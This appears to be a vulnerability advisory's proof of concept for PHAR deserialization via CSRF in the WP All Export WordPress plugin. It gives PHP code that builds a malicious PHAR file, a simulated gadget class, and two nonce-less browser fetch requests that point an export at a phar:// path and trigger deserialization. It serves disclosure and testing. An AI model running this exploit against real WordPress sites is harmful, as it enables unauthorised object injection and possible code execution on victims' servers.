WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Proof of Concept

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

<?php

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


3. Add the following code to the server to simulate a gadget:

class Evil {
	function __wakeup() {
		die('Arbitrary deserialization');
	}
}


4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.

await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
    "mode": "cors",
});

5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.

await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
    "credentials": "include",
    "headers": {},
    "method": "GET",
    "mode": "cors",
});